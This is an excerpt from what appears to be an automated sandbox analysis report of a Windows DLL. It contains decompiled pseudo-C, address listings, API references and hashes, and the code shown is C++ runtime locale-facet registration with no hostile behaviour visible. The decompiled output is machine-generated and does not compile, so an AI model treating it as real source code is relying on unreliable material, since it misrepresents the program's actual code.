												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6D486FD3(__eflags, _t842);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6d546de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6D486FD3(__eflags, _t841);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6d546dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6D486FD3(__eflags, _t840);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6d546db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

0x6d48f037
0x6d48f037
0x6d48f03e
0x6d48f048
0x6d48f04d
0x6d48f058
0x6d48f05c
0x6d48f05f
0x6d48f064
0x6d48f068
0x6d48f06d
0x6d48f071
0x6d48f0b6
0x6d48f0b9
0x6d48f0c5
0x6d48f073
0x6d48f075
0x6d48f07b
0x6d48f081
0x6d48f089
0x6d48f08c
0x6d48f0c9
0x6d48f0d7
0x6d48f0dc
0x6d48f0e4
0x6d48f0ee
0x6d48f0f3
0x6d48f0fe
0x6d48f102
0x6d48f105
0x6d48f10a
0x6d48f113
0x6d48f115
0x6d48f117
0x6d48f15c
0x6d48f15f
0x6d48f16b
0x6d48f119
0x6d48f119
0x6d48f11b
0x6d48f121
0x6d48f127
0x6d48f12f
0x6d48f132
0x6d48f16f
0x6d48f17d
0x6d48f182
0x6d48f18a
0x6d48f194
0x6d48f199
0x6d48f1a4
0x6d48f1a8
0x6d48f1ab
0x6d48f1b0
0x6d48f1b9
0x6d48f1bb
0x6d48f1bd
0x6d48f202
0x6d48f205
0x6d48f211
0x6d48f1bf
0x6d48f1bf
0x6d48f1c1
0x6d48f1c7
0x6d48f1cd
0x6d48f1d5
0x6d48f1d8
0x6d48f215
0x6d48f223
0x6d48f228
0x6d48f230
0x6d48f23a
0x6d48f23f
0x6d48f24a
0x6d48f24e
0x6d48f251
0x6d48f256
0x6d48f25f
0x6d48f261
0x6d48f263
0x6d48f2a8
0x6d48f2ab
0x6d48f2b7
0x6d48f265
0x6d48f265
0x6d48f267
0x6d48f26d
0x6d48f273
0x6d48f27b
0x6d48f27e
0x6d48f2bb
0x6d48f2c9
0x6d48f2ce
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f305
0x6d48f307
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d
0x6d48f280
0x6d48f280
0x6d48f283
0x6d48f287
0x6d48f28b
0x6d48f298
0x6d48f2a0
0x6d48f2a2
0x00000000
0x6d48f2a2
0x6d48f269
0x6d48f269
0x00000000
0x6d48f269
0x6d48f267
0x6d48f1da
0x6d48f1da
0x6d48f1dd
0x6d48f1e1
0x6d48f1e5
0x6d48f1f2
0x6d48f1fa
0x6d48f1fc
0x00000000
0x6d48f1fc
0x6d48f1c3
0x6d48f1c3
0x00000000
0x6d48f1c3
0x6d48f1c1
0x6d48f134
0x6d48f134
0x6d48f137
0x6d48f13b
0x6d48f13f
0x6d48f14c
0x6d48f154
0x6d48f156
0x00000000
0x6d48f156
0x6d48f11d
0x6d48f11d
0x00000000
0x6d48f11d
0x6d48f11b
0x6d48f08e
0x6d48f08e
0x6d48f091
0x6d48f095
0x6d48f099
0x6d48f0a6
0x6d48f0ae
0x6d48f0b0
0x00000000
0x6d48f0b0
0x6d48f077
0x6d48f077
0x00000000
0x6d48f077
0x6d48f075

APIs

__EH_prolog3.LIBCMT ref: 6D48F03E
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F048
int.LIBCPMT ref: 6D48F05F

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D48F082
std::_Facet_Register.LIBCPMT ref: 6D48F099
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F0D7

Strings

hmTm, xrefs: 6D48F053

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hmTm
API String ID: 2363045490-1913511222
Opcode ID: bd2cfda2ab9f283f7f5c0571d0048292ddf74e608fb77f6b52eb74e2b24b3f6e
Instruction ID: fcb12c4c46bdb46650906af00e4b5aaf60407927893454ac5475d2c0e1eb9b22
Opcode Fuzzy Hash: bd2cfda2ab9f283f7f5c0571d0048292ddf74e608fb77f6b52eb74e2b24b3f6e
Instruction Fuzzy Hash: 7711E076C092699BCF01EBA0C844EEDB7B5AF91354F2A400CD611AB399DB71DD0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t858 - 0x14, 0);
				_t819 =  *0x6d546dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6D46161C(0x6d546b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6D4866BA(_t858 - 0x14);
					return E6D4A0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6D490E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t858 - 0x20);
							E6D4A3D74(_t858 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t799, _t819, 0x14);
							E6D486653(_t858 - 0x14, 0);
							_t820 =  *0x6d546de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6D46161C(0x6d546d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6D4866BA(_t858 - 0x14);
								return E6D4A0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6D490EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t858 - 0x20);
										E6D4A3D74(_t858 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t606, _t800, _t820, 0x14);
										E6D486653(_t858 - 0x14, 0);
										_t821 =  *0x6d546db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6D46161C(0x6d546d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6D4866BA(_t858 - 0x14);
											return E6D4A0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6D490F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t858 - 0x20);
													E6D4A3D74(_t858 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t606, _t801, _t821, 0x14);
													E6D486653(_t858 - 0x14, 0);
													_t822 =  *0x6d546dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6D46161C(0x6d546d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6D4866BA(_t858 - 0x14);
														return E6D4A0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6D490F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t858 - 0x20);
																E6D4A3D74(_t858 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t606, _t802, _t822, 0x14);
																E6D486653(_t858 - 0x14, 0);
																_t823 =  *0x6d546dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6D46161C(0x6d546d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6D4866BA(_t858 - 0x14);
																	return E6D4A0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6D490FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t858 - 0x20);
																			E6D4A3D74(_t858 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t606, _t803, _t823, 0x14);
																			E6D486653(_t858 - 0x14, 0);
																			_t824 =  *0x6d546df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6D46161C(0x6d546d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6D4866BA(_t858 - 0x14);
																				return E6D4A0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6D491057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t858 - 0x20);
																						E6D4A3D74(_t858 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t606, _t804, _t824, 0x14);
																						E6D486653(_t858 - 0x14, 0);
																						_t825 =  *0x6d546dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6D46161C(0x6d546d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6D4866BA(_t858 - 0x14);
																							return E6D4A0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6D4910BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t858 - 0x20);
																									E6D4A3D74(_t858 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t606, _t805, _t825, 0x14);
																									E6D486653(_t858 - 0x14, 0);
																									_t826 =  *0x6d546df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6D46161C(0x6d546da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6D4866BA(_t858 - 0x14);
																										return E6D4A0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6D491127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t858 - 0x20);
																												E6D4A3D74(_t858 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t606, _t806, _t826, 0x14);
																												E6D486653(_t858 - 0x14, 0);
																												_t827 =  *0x6d546df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6D46161C(0x6d546da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6D4866BA(_t858 - 0x14);
																													return E6D4A0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6D4911AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t858 - 0x20);
																															E6D4A3D74(_t858 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t606, _t807, _t827, 0x14);
																															E6D486653(_t858 - 0x14, 0);
																															_t828 =  *0x6d546dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6D46161C(0x6d546d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6D4866BA(_t858 - 0x14);
																																return E6D4A0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6D491230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t858 - 0x20);
																																		E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t606, _t808, _t828, 0x14);
																																		E6D486653(_t858 - 0x14, 0);
																																		_t829 =  *0x6d546dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6D46161C(0x6d546d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6D4866BA(_t858 - 0x14);
																																			return E6D4A0075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6D4912B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t858 - 0x20);
																																					E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t606, _t809, _t829, 0x14);
																																					E6D486653(_t858 - 0x14, 0);
																																					_t830 =  *0x6d546dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6D46161C(0x6d546d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6D4866BA(_t858 - 0x14);
																																						return E6D4A0075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6D491339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t858 - 0x20);
																																								E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t606, _t810, _t830, 0x14);
																																								E6D486653(_t858 - 0x14, 0);
																																								_t831 =  *0x6d546db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
